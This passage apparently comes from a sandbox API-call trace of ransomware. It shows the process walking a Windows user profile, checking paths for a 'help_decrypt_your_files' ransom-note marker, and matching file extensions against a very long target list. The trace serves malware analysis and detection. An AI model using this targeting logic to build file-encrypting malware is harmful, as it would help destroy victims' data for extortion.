itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".regtrans-ms") returned 0x0
	[0180.992] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1
	[0180.993] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1
	[0180.993] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1
	[0180.993] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.993] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms"
	[0180.993] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned 114
	[0180.994] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.994] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cchLength=0x72 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned 0x72
	[0180.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.994] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.994] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms"
	[0180.994] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms") returned 114
	[0180.995] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.998] StrStrW (lpFirst=".regtrans-ms", lpSrch=".") returned=".regtrans-ms"
	[0180.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.999] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".regtrans-ms") returned 0x0
	[0180.999] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1
	[0180.999] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1
	[0180.999] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1
	[0180.999] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.999] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="ntuser.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini") returned="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini"
	[0180.999] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini") returned 32
	[0180.999] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.000] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini", cchLength=0x20 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.ini") returned 0x20
	[0181.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.000] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.000] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.ini") returned="c:\\users\\rdhj0cnfevzx\\ntuser.ini"
	[0181.000] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.ini") returned 32
	[0181.001] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.002] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0181.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.002] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmana